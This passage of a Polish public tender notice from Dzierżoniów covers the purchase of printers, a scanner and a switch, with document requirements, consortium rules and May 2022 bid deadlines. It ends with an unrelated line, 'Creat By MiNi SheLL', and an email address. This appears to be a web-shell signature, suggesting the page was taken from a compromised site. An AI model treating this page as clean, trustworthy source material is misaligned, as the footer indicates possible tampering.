dowodów określających, czy te<br/>dostawy zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są<br/>referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy zostały<br/>wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli<br/>wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów –<br/>oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal<br/>wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być<br/>wystawione w okresie ostatnich 3 miesięcy. Wzór wykazu dostaw stanowi<br/>załącznik nr 6 do SWZ. Jeżeli Wykonawca powołuje się na doświadczenie w realizacji dostaw, wykonywanych wspólnie z<br/>innymi Wykonawcami, wykaz, o którym mowa powyżej dotyczy wyłącznie takich dostaw, w których<br/>wykonaniu wykonawca ten bezpośrednio uczestniczył, a w przypadku świadczeń powtarzających się<br/>lub ciągłych, w których wykonywaniu bezpośrednio uczestniczył lub uczestniczy.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Ofertę należy sporządzić zgodnie ze wzorem stanowiącym załącznik<br/>nr 1 do SWZ.<br/>2. Aktualne na dzień złożenia oświadczenia o niepodleganiu wykluczeniu oraz spełnianiu<br/>warunków udziału w postępowaniu należy złożyć zgodnie ze wzorem stanowiącym załącznik nr 2 w zakresie wskazanym w SWZ – każdy osobno<br/>spośród<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia (dotyczy również wspólników<br/>spółki cywilnej) i podmiot trzeci, na którego potencjał powołuje się Wykonawca celem<br/>potwierdzenia spełnienia warunków udziału w postępowaniu. Oferta oraz oświadczenie o<br/>niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu muszą być<br/>złożone w oryginale. To samo dotyczy oświadczenia Wykonawcy o tym, że zachodzą wobec<br/>niego podstawy wykluczenia z postępowania na podstawie art. 108 ust. 1 pkt. 1, 2 ,5 ustawy<br/>Pzp.<br/>3. Gdy umocowanie osoby składającej ofertę nie wynika z dokumentów rejestrowych,<br/>Wykonawca, który składa ofertę za pośrednictwem pełnomocnika, powinien dołączyć do oferty<br/>dokument pełnomocnictwa obejmujący swym zakresem umocowanie do złożenia oferty lub do<br/>złożenia oferty i podpisania umowy.<br/>Wykonawca składa dokument potwierdzający, że osoba działająca w imieniu Wykonawcy jest<br/>umocowana do jego reprezentowania - odpis lub informacja z Krajowego Rejestru Sądowego,<br/>Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru<br/>W przypadku Wykonawców ubiegających się wspólnie o<br/>udzielenie zamówienia Wykonawcy zobowiązani są do ustanowienia pełnomocnika.<br/>Pełnomocnictwo do złożenia oferty musi być złożone w oryginale w takiej samej formie, jak<br/>składana jest oferta (tj. w formie elektronicznej opatrzonej kwalifikowanym podpisem<br/>elektronicznym lub w postaci elektronicznej opatrzonej podpisem zaufanym, lub podpisem<br/>osobistym). Dopuszcza się także złożenie elektronicznej kopii (skanu) pełnomocnictwa<br/>sporządzonego uprzednio w formie pisemnej, w formie elektronicznego poświadczenia sporządzonego stosownie do art. 97 par 2 ustawy z dnia 14 lutego 1991 r. – Prawo o notariacie,<br/>które to poświadczenie notariusz opatruje kwalifikowanym podpisem elektronicznym, bądź też<br/>poprzez opatrzenie skanu pełnomocnictwa sporządzonego uprzednio w formie pisemnej<br/>kwalifikowanym podpisem, podpisem zaufanym lub podpisem osobistym mocodawcy.<br/>Elektroniczna kopia pełnomocnictwa nie może być uwierzytelniona przez upełnomocnionego. 4. Oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia stanowi załącznik nr 5 do SWZ (o ile dotyczy).<br/>5. Zobowiązanie podmiotu trzeciego stanowi załącznik nr 4 do SWZ (o ile dotyczy).<br/>6. W przypadku gdy Wykonawca powierza wykonanie części zamówienia<br/>podwykonawcy, zobowiązany jest do wykazania w załączniku nr 3 do SWZ, <br/>informacji o części zamówienia, której wykonanie zamierza powierzyć podwykonawcom oraz<br/>podania nazw ich firm, o ile są już znane.<br/>7.Zastrzeżenie tajemnicy przedsiębiorstwa – W przypadku informacji<br/>objętych tajemnicą<br/>przedsiębiorstwa Wykonawca powinien w momencie ich przekazania wyraźnie oznaczyć, które<br/>informacje stanowią tajemnicę przedsiębiorstwa oraz nie powinny być udostępniane. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> a) Wykonawcy występujący wspólnie są zobowiązani do ustanowienia pełnomocnika do<br/>reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia<br/>umowy w sprawie przedmiotowego zamówienia publicznego; b) Wszelka korespondencja<br/>będzie prowadzona przez Zamawiającego wyłącznie z pełnomocnikiem; c) Do oferty należy<br/>załączyć pełnomocnictwo dla ustanowionego pełnomocnika; d) Wykonawcy składają jedną<br/>ofertę, do której załączone będą dokumenty, o których mowa w SWZ; e) Wykonawca winien<br/>przedłożyć<br/>dokumenty i oświadczenia wymienione w rozdziale IV SWZ dotyczące każdego<br/>partnera konsorcjum osobno w zakresie tam wskazanym ; f) Oświadczenia i dokumenty<br/>wspólne, takie jak np.: oferta cenowa, składa pełnomocnik Wykonawców w imieniu wszystkich;<br/>g) Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich<br/>Wykonawców występujących wspólnie; h) wszyscy partnerzy będą ponosić odpowiedzialność<br/>solidarną za wykonanie umowy zgodnie z jej postanowieniami; i) przed podpisaniem umowy<br/>Wykonawcy<br/>składający ofertę wspólną będą mieli obowiązek przedstawić Zamawiającemu umowę<br/>konsorcjum. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku<br/>do treści oferty, na podstawie, której dokonano wyboru Wykonawcy. Okoliczności zostały<br/>wskazane w w § 11 projektu umowy stanowiącym załącznik nr 9 do<br/>SWZ.<br/>Postanowienia zawarte w § 11 projektu umowy stanowią katalog zmian, na które Zamawiający<br/>może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody.<br/>Wymienione powyższe możliwości wprowadzenia zmian są uprawnieniem a nie obowiązkiem<br/>Zamawiającego. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-05-12 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Za pośrednictwem Platformy Zakupowej: https://dzierzoniow.ezamawiajacy.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-05-12 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-06-10</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Wykonawcy oraz innemu podmiotowi, jeżeli ma lub miał interes w uzyskaniu zamówienia oraz<br/>poniósł lub może ponieść szkodę w wyniku naruszenia przez Zamawiającego przepisów ustawy<br/>Pzp, przysługują środki ochrony prawnej określone w dziale IX ustawy Pzp. Wymagany termin<br/>realizacji zamówienia zgodnie z ofertą – minimalny termin dostawy do<br/>60 dni, maksymalny termin do 120 dni od daty zawarcia umowy. Pełna nazwa zamówienia<br/>publicznego: Wykonanie dostawy sprzętu informatycznego w ramach realizacji konkursu grantowego Cyfrowa Gmina obejmującą: Dostawę Urządzeń wielofunkcyjnych kolorowych (19 szt.), Urządzeń wielofunkcyjnych mono (8 szt.) skanera (1szt.) i switcha (1 szt.). Zamawiający wykluczy wykonawcę w<br/>przypadku zaistnienia okoliczności przewidzianych postanowieniami art. 7 ust. 1<br/>ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę<br/>oraz służących ochronie bezpieczeństwa narodowego (Dz.U. z 2022 r., poz. 835).

Creat By MiNi SheLL
Email: jattceo@gmail.com